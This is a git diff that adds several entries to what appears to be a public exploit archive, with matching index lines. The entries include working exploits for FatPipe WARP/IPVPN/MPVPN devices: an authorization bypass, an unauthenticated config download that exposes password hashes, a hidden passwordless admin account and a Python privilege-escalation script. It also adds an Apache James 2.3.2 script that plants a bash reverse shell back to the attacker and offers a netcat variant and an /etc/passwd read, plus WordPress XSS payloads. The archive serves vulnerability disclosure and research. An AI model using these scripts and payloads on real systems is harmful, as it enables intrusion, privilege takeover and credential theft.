diff --git a/exploits/hardware/webapps/50338.txt b/exploits/hardware/webapps/50338.txt
new file mode 100644
index 000000000..528d7d010
--- /dev/null
+++ b/exploits/hardware/webapps/50338.txt
@@ -0,0 +1,108 @@
+# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF)
+# Date: 25.07.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.fatpipeinc.com
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50339.txt b/exploits/hardware/webapps/50339.txt
new file mode 100644
index 000000000..21ea88241
--- /dev/null
+++ b/exploits/hardware/webapps/50339.txt
@@ -0,0 +1,81 @@
+# Exploit Title: FatPipe Networks WARP 10.2.2 - Authorization Bypass
+# Date: 25.07.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.fatpipeinc.com
+
+FatPipe Networks WARP 10.2.2 Authorization Bypass
+
+
+Vendor: FatPipe Networks Inc.
+Product web page: https://www.fatpipeinc.com
+Affected version: WARP
+ 10.2.2r38
+ 10.2.2r25
+ 10.2.2r10
+ 10.1.2r60p82
+ 10.1.2r60p71
+ 10.1.2r60p65
+ 10.1.2r60p58s1
+ 10.1.2r60p58
+ 10.1.2r60p55
+ 10.1.2r60p45
+ 10.1.2r60p35
+ 10.1.2r60p32
+ 10.1.2r60p13
+ 10.1.2r60p10
+ 9.1.2r185
+ 9.1.2r180p2
+ 9.1.2r165
+ 9.1.2r164p5
+ 9.1.2r164p4
+ 9.1.2r164
+ 9.1.2r161p26
+ 9.1.2r161p20
+ 9.1.2r161p17
+ 9.1.2r161p16
+ 9.1.2r161p12
+ 9.1.2r161p3
+ 9.1.2r161p2
+ 9.1.2r156
+ 9.1.2r150
+ 9.1.2r144
+ 9.1.2r129
+ 7.1.2r39
+ 6.1.2r70p75-m
+ 6.1.2r70p45-m
+ 6.1.2r70p26
+ 5.2.0r34
+
+Summary: FatPipe Networks invented the concept of router-clustering,
+which provides the highest level of reliability, redundancy, and speed
+of Internet traffic for Business Continuity and communications. FatPipe
+WARP achieves fault tolerance for companies by creating an easy method
+of combining two or more Internet connections of any kind over multiple
+ISPs. FatPipe utilizes all paths when the lines are up and running,
+dynamically balancing traffic over the multiple lines, and intelligently
+failing over inbound and outbound IP traffic when ISP services and/or
+components fail.
+
+Desc: Improper access control occurs when the application provides direct
+access to objects based on user-supplied input. As a result of this vulnerability
+attackers can bypass authorization and access resources behind protected
+pages.
+
+Tested on: Apache-Coyote/1.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5682
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php
+
+
+30.05.2016
+25.07.2021
+
+--
+
+
+$ curl -vk "https://10.0.0.9/fpui/jsp/index.jsp"
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50340.txt b/exploits/hardware/webapps/50340.txt
new file mode 100644
index 000000000..2abe48519
--- /dev/null
+++ b/exploits/hardware/webapps/50340.txt
@@ -0,0 +1,182 @@
+# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)
+# Date: 25.07.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.fatpipeinc.com
+
+FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Unauthenticated Config Download
+
+
+Vendor: FatPipe Networks Inc.
+Product web page: https://www.fatpipeinc.com
+Affected version: WARP / IPVPN / MPVPN
+ 10.2.2r38
+ 10.2.2r25
+ 10.2.2r10
+ 10.1.2r60p82
+ 10.1.2r60p71
+ 10.1.2r60p65
+ 10.1.2r60p58s1
+ 10.1.2r60p58
+ 10.1.2r60p55
+ 10.1.2r60p45
+ 10.1.2r60p35
+ 10.1.2r60p32
+ 10.1.2r60p13
+ 10.1.2r60p10
+ 9.1.2r185
+ 9.1.2r180p2
+ 9.1.2r165
+ 9.1.2r164p5
+ 9.1.2r164p4
+ 9.1.2r164
+ 9.1.2r161p26
+ 9.1.2r161p20
+ 9.1.2r161p17
+ 9.1.2r161p16
+ 9.1.2r161p12
+ 9.1.2r161p3
+ 9.1.2r161p2
+ 9.1.2r156
+ 9.1.2r150
+ 9.1.2r144
+ 9.1.2r129
+ 7.1.2r39
+ 6.1.2r70p75-m
+ 6.1.2r70p45-m
+ 6.1.2r70p26
+ 5.2.0r34
+
+Summary: FatPipe Networks invented the concept of router-clustering,
+which provides the highest level of reliability, redundancy, and speed
+of Internet traffic for Business Continuity and communications. FatPipe
+WARP achieves fault tolerance for companies by creating an easy method
+of combining two or more Internet connections of any kind over multiple
+ISPs. FatPipe utilizes all paths when the lines are up and running,
+dynamically balancing traffic over the multiple lines, and intelligently
+failing over inbound and outbound IP traffic when ISP services and/or
+components fail.
+
+FatPipe IPVPN balances load and provides reliability among multiple
+managed and CPE based VPNs as well as dedicated private networks. FatPipe
+IPVPN can also provide you an easy low-cost migration path from private
+line, Frame or Point-to-Point networks. You can aggregate multiple private,
+MPLS and public networks without additional equipment at the provider's
+site.
+
+FatPipe MPVPN, a patented router clustering device, is an essential part
+of Disaster Recovery and Business Continuity Planning for Virtual Private
+Network (VPN) connectivity. It makes any VPN up to 900% more secure and
+300% times more reliable, redundant and faster. MPVPN can take WANs with
+an uptime of 99.5% or less and make them 99.999988% or higher, providing
+a virtually infallible WAN. MPVPN dynamically balances load over multiple
+lines and ISPs without the need for BGP programming. MPVPN aggregates up
+to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
+you need to keep your VPN up and running despite failures of service, line,
+software, or hardware.
+
+Desc: The application is vulnerable to unauthenticated configuration disclosure
+when direct object reference is made to the backup archive file using an HTTP
+GET request. The only unknown part of the filename is the hostname of the system.
+This will enable the attacker to disclose sensitive information and help her
+in authentication bypass, privilege escalation and full system access.
+
+Tested on: Apache-Coyote/1.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5683
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5683.php
+
+
+30.05.2016
+25.07.2021
+
+--
+
+
+Products:
+---------
+WARP / MPVPN / IPVPN
+
+Format:
+-------
+https://[TARGET]/fpui/[HostName]-config-[Product]-[Version]-mcore.tar.gz
+
+Examples:
+---------
+curl -sk https://10.0.0.7/fpui/ZSLAB-config-WARP-9.1.2r161p19-mcore.tar.gz # For WARP
+curl -sk https://10.0.0.8/fpui/testingus-config-VPN-10.2.2r38-mcore.tar.gz # For MPVPN/IPVPN
+
+Version:
+--------
+$ curl -sk https://10.0.0.9/fpui/jsp/login.jsp |findstr /spina:d "10.2"
+103: 10.2.2r38
+
+Product:
+--------
+$ curl -sk https://10.0.0.9/fpui/jsp/login.jsp |findstr /spina:d "FatPipe"
+15: FatPipe MPVPN | Log in
+
+Content:
+--------
+$ tar -xf testingus-config-VPN-10.2.2r38-mcore.tar.gz
+$ cd etc
+$ cat Xpasswd
+Administrator:26df420bcb78bb02eef532d51aea22e2:1
+fatpipe:3b5afbb47fc3067d62d73f5bb1f92b5b:1
+
+$ ls
+.
+..
+auto_config.conf
+bird.conf
+bridge.conf
+cm.conf
+crontab
+dhcpd.conf
+dnssec.conf
+dynamic_route.conf
+fatpipe
+fileserver.conf
+fp_arp.conf
+fp_config.dtd
+fp_distributed_global_rule
+fp_global_rule
+fp_version
+haproxy
+hosts
+interface_access_list.conf
+ipsec.conf
+ipsec.d
+ipsec.secrets
+ipsec_cert_secrets
+ipsec_shared_secrets
+ipsec_subnet.conf
+ipsec_xauth.conf
+ipv4_dynamic_routing.conf
+logrotate.d
+manifest
+named.conf
+network_object.conf
+ntp.conf
+ppp
+radiusclient
+resolv.conf
+rsyslog.conf
+site.xml
+site.xml.org
+snmp_config.conf
+squid
+sysconfig
+syslog.conf
+tcp-congestion-table.conf
+tcp-congestion-table.conf.org
+webfilter.conf
+xgreet.txt
+xnetmap.conf
+Xpasswd
+xsnmp.conf
+xtreme_conf.xml
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50341.txt b/exploits/hardware/webapps/50341.txt
new file mode 100644
index 000000000..912ef064d
--- /dev/null
+++ b/exploits/hardware/webapps/50341.txt
@@ -0,0 +1,118 @@
+# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)
+# Date: 25.07.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.fatpipeinc.com
+
+FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account (Write Access)
+
+
+Vendor: FatPipe Networks Inc.
+Product web page: https://www.fatpipeinc.com
+Affected version: WARP / IPVPN / MPVPN
+ 10.2.2r38
+ 10.2.2r25
+ 10.2.2r10
+ 10.1.2r60p82
+ 10.1.2r60p71
+ 10.1.2r60p65
+ 10.1.2r60p58s1
+ 10.1.2r60p58
+ 10.1.2r60p55
+ 10.1.2r60p45
+ 10.1.2r60p35
+ 10.1.2r60p32
+ 10.1.2r60p13
+ 10.1.2r60p10
+ 9.1.2r185
+ 9.1.2r180p2
+ 9.1.2r165
+ 9.1.2r164p5
+ 9.1.2r164p4
+ 9.1.2r164
+ 9.1.2r161p26
+ 9.1.2r161p20
+ 9.1.2r161p17
+ 9.1.2r161p16
+ 9.1.2r161p12
+ 9.1.2r161p3
+ 9.1.2r161p2
+ 9.1.2r156
+ 9.1.2r150
+ 9.1.2r144
+ 9.1.2r129
+ 7.1.2r39
+ 6.1.2r70p75-m
+ 6.1.2r70p45-m
+ 6.1.2r70p26
+ 5.2.0r34
+
+Summary: FatPipe Networks invented the concept of router-clustering,
+which provides the highest level of reliability, redundancy, and speed
+of Internet traffic for Business Continuity and communications. FatPipe
+WARP achieves fault tolerance for companies by creating an easy method
+of combining two or more Internet connections of any kind over multiple
+ISPs. FatPipe utilizes all paths when the lines are up and running,
+dynamically balancing traffic over the multiple lines, and intelligently
+failing over inbound and outbound IP traffic when ISP services and/or
+components fail.
+
+FatPipe IPVPN balances load and provides reliability among multiple
+managed and CPE based VPNs as well as dedicated private networks. FatPipe
+IPVPN can also provide you an easy low-cost migration path from private
+line, Frame or Point-to-Point networks. You can aggregate multiple private,
+MPLS and public networks without additional equipment at the provider's
+site.
+
+FatPipe MPVPN, a patented router clustering device, is an essential part
+of Disaster Recovery and Business Continuity Planning for Virtual Private
+Network (VPN) connectivity. It makes any VPN up to 900% more secure and
+300% times more reliable, redundant and faster. MPVPN can take WANs with
+an uptime of 99.5% or less and make them 99.999988% or higher, providing
+a virtually infallible WAN. MPVPN dynamically balances load over multiple
+lines and ISPs without the need for BGP programming. MPVPN aggregates up
+to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
+you need to keep your VPN up and running despite failures of service, line,
+software, or hardware.
+
+Desc: The application has a hidden administrative account 'cmuser' that has
+no password and has write access permissions to the device. The user cmuser
+is not visible in Users menu list of the application.
+
+Tested on: Apache-Coyote/1.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5684
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php
+
+
+30.05.2016
+25.07.2021
+
+--
+
+
+Overview:
+FatPipe Central Manager is a secure web based solution providing a centralized solution
+to manage FatPipe's suite of WAN reliability and optimization products. Central Manager
+allows you to configure, manage and monitor FatPipe's patented MPSec technology at the
+click of a button.
+
+Central Manager = cmuser.
+Once authenticated, you get admin rights.
+
+HTTP/1.1 200 OK
+Server: Apache-Coyote/1.1
+Strict-Transport-Security: max-age=31536000
+X-Frame-Options: DENY
+X-Content-Type-Options: nosniff
+X-XSS-Protection: 1; mode=block
+Content-Type: application/json;charset=ISO-8859-1
+Content-Length: 118
+Date: Fri, 06 Aug 2017 16:37:07 GMT
+Connection: close
+
+{"loginRes":"success","userName":"userName","userAccess":"writeAccess","activeUserName":"cmuser","message":"noError"}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50342.py b/exploits/hardware/webapps/50342.py
new file mode 100755
index 000000000..0e82e9247
--- /dev/null
+++ b/exploits/hardware/webapps/50342.py
@@ -0,0 +1,191 @@
+# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation
+# Date: 25.07.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.fatpipeinc.com
+
+#!/usr/bin/env python3
+#
+#
+# FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation
+#
+#
+# Vendor: FatPipe Networks Inc.
+# Product web page: https://www.fatpipeinc.com
+# Affected version: WARP / IPVPN / MPVPN
+# 10.2.2r38
+# 10.2.2r25
+# 10.2.2r10
+# 10.1.2r60p82
+# 10.1.2r60p71
+# 10.1.2r60p65
+# 10.1.2r60p58s1
+# 10.1.2r60p58
+# 10.1.2r60p55
+# 10.1.2r60p45
+# 10.1.2r60p35
+# 10.1.2r60p32
+# 10.1.2r60p13
+# 10.1.2r60p10
+# 9.1.2r185
+# 9.1.2r180p2
+# 9.1.2r165
+# 9.1.2r164p5
+# 9.1.2r164p4
+# 9.1.2r164
+# 9.1.2r161p26
+# 9.1.2r161p20
+# 9.1.2r161p17
+# 9.1.2r161p16
+# 9.1.2r161p12
+# 9.1.2r161p3
+# 9.1.2r161p2
+# 9.1.2r156
+# 9.1.2r150
+# 9.1.2r144
+# 9.1.2r129
+# 7.1.2r39
+# 6.1.2r70p75-m
+# 6.1.2r70p45-m
+# 6.1.2r70p26
+# 5.2.0r34
+#
+# Summary: FatPipe Networks invented the concept of router-clustering,
+# which provides the highest level of reliability, redundancy, and speed
+# of Internet traffic for Business Continuity and communications. FatPipe
+# WARP achieves fault tolerance for companies by creating an easy method
+# of combining two or more Internet connections of any kind over multiple
+# ISPs. FatPipe utilizes all paths when the lines are up and running,
+# dynamically balancing traffic over the multiple lines, and intelligently
+# failing over inbound and outbound IP traffic when ISP services and/or
+# components fail.
+#
+# FatPipe IPVPN balances load and provides reliability among multiple
+# managed and CPE based VPNs as well as dedicated private networks. FatPipe
+# IPVPN can also provide you an easy low-cost migration path from private
+# line, Frame or Point-to-Point networks. You can aggregate multiple private,
+# MPLS and public networks without additional equipment at the provider's
+# site.
+#
+# FatPipe MPVPN, a patented router clustering device, is an essential part
+# of Disaster Recovery and Business Continuity Planning for Virtual Private
+# Network (VPN) connectivity. It makes any VPN up to 900% more secure and
+# 300% times more reliable, redundant and faster. MPVPN can take WANs with
+# an uptime of 99.5% or less and make them 99.999988% or higher, providing
+# a virtually infallible WAN. MPVPN dynamically balances load over multiple
+# lines and ISPs without the need for BGP programming. MPVPN aggregates up
+# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
+# you need to keep your VPN up and running despite failures of service, line,
+# software, or hardware.
+#
+# Desc: The application suffers from a privilege escalation vulnerability.
+# A normal user (group USER, 0) can elevate her privileges by sending a HTTP
+# POST request and setting the JSON parameter 'privilege' to integer value
+# '1' gaining administrative rights (group ADMINISTRATOR, 1).
+#
+# Tested on: Apache-Coyote/1.1
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2021-5685
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php
+#
+#
+# 30.05.2016
+# 25.07.2021
+#
+#
+
+import sys
+import time#######
+import requests################
+requests.packages.urllib3.disable_warnings()
+
+if len(sys.argv) !=2:
+ print
+ print("********************************************************")
+ print("* *")
+ print("* Privilege escalation from USER to ADMINISTRATOR role *")
+ print("* in *")
+ print("* FatPipe WARP/IPVPN/MPVPN v10.2.2 *")
+ print("* *")
+ print("* ZSL-2021-5685 *")
+ print("* *")
+ print("********************************************************")
+ print("\n[POR] Usage: ./escalator.py [IP]")
+ sys.exit()
+
+ajpi=sys.argv[1]
+print
+juzer=raw_input("[UNE] Username: ")
+pasvord=raw_input("[UNE] Password: ")
+
+sesija=requests.session()
+logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'}
+
+hederi={'Sec-Ch-Ua' :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"',
+ 'Accept' :'application/json, text/javascript, */*; q=0.01',
+ 'X-Requested-With':'XMLHttpRequest',
+ 'Sec-Ch-Ua-Mobile':'?0',
+ 'User-Agent' :'Fatnet/1.b',
+ 'Content-Type' :'application/x-www-form-urlencoded; charset=UTF-8',
+ 'Origin' :'https://'+ajpi,
+ 'Sec-Fetch-Site' :'same-origin',
+ 'Sec-Fetch-Mode' :'cors',
+ 'Sec-Fetch-Dest' :'empty',
+ 'Referer' :'https://'+ajpi+'/fpui/dataCollectionServlet',
+ 'Accept-Encoding' :'gzip, deflate',
+ 'Accept-Language' :'en-US,en;q=0.9',
+ 'Connection' :'close'}
+
+juarel1='https://'+ajpi+'/fpui/loginServlet'
+alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False)
+
+if not 'success' in alo.text:
+ print('[GRE] Login error.')
+ sys.exit()
+else:
+ print('[POR] Authentication successful.')
+
+print('[POR] Climbing the ladder...')
+
+sluba='''
+|| || .--._
+||====|| __ '---._)
+|| ||"")\ Q Q )
+||====|| =_/ o /
+|| || | \_.-;-'-,._
+||====|| | ' o---o )
+|| || \ /H __H\ /
+||====|| '-' \"")\/ |
+|| || _ |_='-)_/
+||====|| / '. )
+|| || / /
+||====|| |___/\| /
+|| || |_| | |
+||====|| / ) \\ \\
+|| || (__/ \___\\
+||====|| \_\\
+|| || / )
+||====|| (__/
+'''
+
+for k in sluba:
+ sys.stdout.write(k)
+ sys.stdout.flush()
+ time.sleep(0.01)
+
+juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest'
+posta={
+'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]'
+}
+stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False)
+
+if not 'true' in stanje.text:
+ print('\n[GRE] Something\'s fishy!')
+ sys.exit()
+else:
+ print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.')
+ sys.exit()
\ No newline at end of file
diff --git a/exploits/linux/remote/50347.py b/exploits/linux/remote/50347.py
new file mode 100755
index 000000000..ebaae986d
--- /dev/null
+++ b/exploits/linux/remote/50347.py
@@ -0,0 +1,103 @@
+# Exploit Title: Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)
+# Date: 27/09/2021
+# Exploit Author: shinris3n
+# Vendor Homepage: http://james.apache.org/server/
+# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
+# Version: Apache James Server 2.3.2
+# Tested on: Ubuntu
+# Info: This exploit works on default installation of Apache James Server 2.3.2
+# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d
+
+'''
+This Python 3 implementation is based on the original (Python 2) exploit code developed by
+Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec. The following modifications were made:
+
+1 - Made required changes to print and socket commands for Python 3 compatibility.
+1 - Changed the default payload to a basic bash reverse shell script and added a netcat option.
+2 - Changed the command line syntax to allow user input of remote ip, local ip and listener port to correspond with #2.
+3 - Added a payload that can be used for testing remote command execution and connectivity.
+4 - Added payload and listener information output based on payload selection and user input.
+5 - Added execution output clarifications and additional informational comments throughout the code.
+
+@shinris3n
+https://twitter.com/shinris3n
+https://shinris3n.github.io/
+'''
+
+#!/usr/bin/python3
+
+import socket
+import sys
+import time
+
+# credentials to James Remote Administration Tool (Default - root/root)
+user = 'root'
+pwd = 'root'
+
+if len(sys.argv) != 4:
+ sys.stderr.write("[-]Usage: python3 %s \n" % sys.argv[0])
+ sys.stderr.write("[-]Example: python3 %s 172.16.1.66 172.16.1.139 443\n" % sys.argv[0])
+ sys.stderr.write("[-]Note: The default payload is a basic bash reverse shell - check script for details and other options.\n")
+ sys.exit(1)
+
+remote_ip = sys.argv[1]
+local_ip = sys.argv[2]
+port = sys.argv[3]
+
+# Select payload prior to running script - default is a reverse shell executed upon any user logging in (i.e. via SSH)
+payload = '/bin/bash -i >& /dev/tcp/' + local_ip + '/' + port + ' 0>&1' # basic bash reverse shell exploit executes after user login
+#payload = 'nc -e /bin/sh ' + local_ip + ' ' + port # basic netcat reverse shell
+#payload = 'echo $USER && cat /etc/passwd && ping -c 4 ' + local_ip # test remote command execution capabilities and connectivity
+#payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # proof of concept exploit on root user login only
+
+print ("[+]Payload Selected (see script for more options): ", payload)
+if '/bin/bash' in payload:
+ print ("[+]Example netcat listener syntax to use after successful execution: nc -lvnp", port)
+
+
+def recv(s):
+ s.recv(1024)
+ time.sleep(0.2)
+
+try:
+ print ("[+]Connecting to James Remote Administration Tool...")
+ s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+ s.connect((remote_ip,4555)) # Assumes James Remote Administration Tool is running on Port 4555, change if necessary.
+ s.recv(1024)
+ s.send((user + "\n").encode('utf-8'))
+ s.recv(1024)
+ s.send((pwd + "\n").encode('utf-8'))
+ s.recv(1024)
+ print ("[+]Creating user...")
+ s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n".encode('utf-8'))
+ s.recv(1024)
+ s.send("quit\n".encode('utf-8'))
+ s.close()
+
+ print ("[+]Connecting to James SMTP server...")
+ s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+ s.connect((remote_ip,25)) # Assumes default SMTP port, change if necessary.
+ s.send("ehlo team@team.pl\r\n".encode('utf-8'))
+ recv(s)
+ print ("[+]Sending payload...")
+ s.send("mail from: <'@team.pl>\r\n".encode('utf-8'))
+ recv(s)
+ # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n".encode('utf-8')) if the recipient cannot be found
+ s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n".encode('utf-8'))
+ recv(s)
+ s.send("data\r\n".encode('utf-8'))
+ recv(s)
+ s.send("From: team@team.pl\r\n".encode('utf-8'))
+ s.send("\r\n".encode('utf-8'))
+ s.send("'\n".encode('utf-8'))
+ s.send((payload + "\n").encode('utf-8'))
+ s.send("\r\n.\r\n".encode('utf-8'))
+ recv(s)
+ s.send("quit\r\n".encode('utf-8'))
+ recv(s)
+ s.close()
+ print ("[+]Done! Payload will be executed once somebody logs in (i.e. via SSH).")
+ if '/bin/bash' in payload:
+ print ("[+]Don't forget to start a listener on port", port, "before logging in!")
+except:
+ print ("Connection failed.")
\ No newline at end of file
diff --git a/exploits/php/webapps/50343.txt b/exploits/php/webapps/50343.txt
new file mode 100644
index 000000000..e0d5522bc
--- /dev/null
+++ b/exploits/php/webapps/50343.txt
@@ -0,0 +1,21 @@
+# Exploit Title: WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
+# Date: 06-08-2021
+# Exploit Author: Nosa Shandy (Apapedulimu)
+# Vendor Homepage: https://translatepress.com/
+# Software Link: https://wordpress.org/plugins/translatepress-multilingual/
+# Reference: https://wpscan.com/vulnerability/b87fcc2f-c2eb-4e23-9757-d1c590f26d3f
+# Version: 2.0.6
+# Tested on: macOS 11.4
+# CVE : CVE-2021-24610
+
+Description:
+The plugin does not implement a proper filter on the 'translated' parameter when input to the database. The 'trp_sanitize_string' function only check the "" with the preg_replace, the attacker can use the HTML Tag to execute javascript.
+
+Step To Reproduce:
+1. Go to http://localhost:8888/wordpress/?trp-edit-translation=true
+2. Input Gettext String
+3. Input the payload such as
+4. Save, The payload will be executed.
+5. Look on the homepage will be affected.
+
+Video : https://drive.google.com/file/d/1PnvjHuKCvjmom6xz_sxNLBu3jixCiHy_/view?usp=sharing
\ No newline at end of file
diff --git a/exploits/php/webapps/50344.txt b/exploits/php/webapps/50344.txt
new file mode 100644
index 000000000..491c6280d
--- /dev/null
+++ b/exploits/php/webapps/50344.txt
@@ -0,0 +1,13 @@
+# Exploit Title: WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
+# Date: 3/28/2021
+# Author: 0xB9
+# Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/
+# Version: 1.7.14
+# Tested on: Windows 10
+# CVE: CVE-2021-24276
+
+1. Description:
+The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
+
+2. Proof of Concept:
+/wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
\ No newline at end of file
diff --git a/exploits/php/webapps/50345.txt b/exploits/php/webapps/50345.txt
new file mode 100644
index 000000000..3fb42cad2
--- /dev/null
+++ b/exploits/php/webapps/50345.txt
@@ -0,0 +1,13 @@
+# Exploit Title: WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)
+# Date: 3/28/2021
+# Author: 0xB9
+# Software Link: https://wordpress.org/plugins/ultimate-maps-by-supsystic/
+# Version: 1.2.4
+# Tested on: Windows 10
+# CVE: CVE-2021-24274
+
+1. Description:
+The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
+
+2. Proof of Concept:
+/wp-admin/admin.php?page=ultimate-maps-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
\ No newline at end of file
diff --git a/exploits/php/webapps/50346.txt b/exploits/php/webapps/50346.txt
new file mode 100644
index 000000000..9aa1ba1e2
--- /dev/null
+++ b/exploits/php/webapps/50346.txt
@@ -0,0 +1,13 @@
+# Exploit Title: WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
+# Date: 3/28/2021
+# Author: 0xB9
+# Software Link: https://wordpress.org/plugins/popup-by-supsystic/
+# Version: 1.10.4
+# Tested on: Windows 10
+# CVE: CVE-2021-24275
+
+1. Description:
+The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
+
+2. Proof of Concept:
+/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ad8c32547..1495e51f5 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18539,6 +18539,7 @@ id,file,description,date,author,type,platform,port
50216,exploits/linux/remote/50216.py,"crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow",1970-01-01,"Khaled Salem",remote,linux,
50282,exploits/hardware/remote/50282.txt,"ECOA Building Automation System - Hard-coded Credentials SSH Access",1970-01-01,Neurogenesia,remote,hardware,
50335,exploits/hardware/remote/50335.py,"Cisco small business RV130W 1.0.3.44 - Inject Counterfeit Routers",1970-01-01,"Michael Alamoot",remote,hardware,
+50347,exploits/linux/remote/50347.py,"Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)",1970-01-01,shinris3n,remote,linux,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44453,3 +44454,12 @@ id,file,description,date,author,type,platform,port
50329,exploits/php/webapps/50329.txt,"Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass",1970-01-01,"Janik Wehrli",webapps,php,
50333,exploits/php/webapps/50333.txt,"WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Renos Nikolaou",webapps,php,
50334,exploits/php/webapps/50334.txt,"Library System 1.0 - 'student_id' SQL injection (Authenticated)",1970-01-01,"Vinay Bhuria",webapps,php,
+50338,exploits/hardware/webapps/50338.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware,
+50339,exploits/hardware/webapps/50339.txt,"FatPipe Networks WARP 10.2.2 - Authorization Bypass",1970-01-01,LiquidWorm,webapps,hardware,
+50340,exploits/hardware/webapps/50340.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
+50341,exploits/hardware/webapps/50341.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)",1970-01-01,LiquidWorm,webapps,hardware,
+50342,exploits/hardware/webapps/50342.py,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation",1970-01-01,LiquidWorm,webapps,hardware,
+50343,exploits/php/webapps/50343.txt,"WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Nosa Shandy",webapps,php,
+50344,exploits/php/webapps/50344.txt,"WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
+50345,exploits/php/webapps/50345.txt,"WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
+50346,exploits/php/webapps/50346.txt,"WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,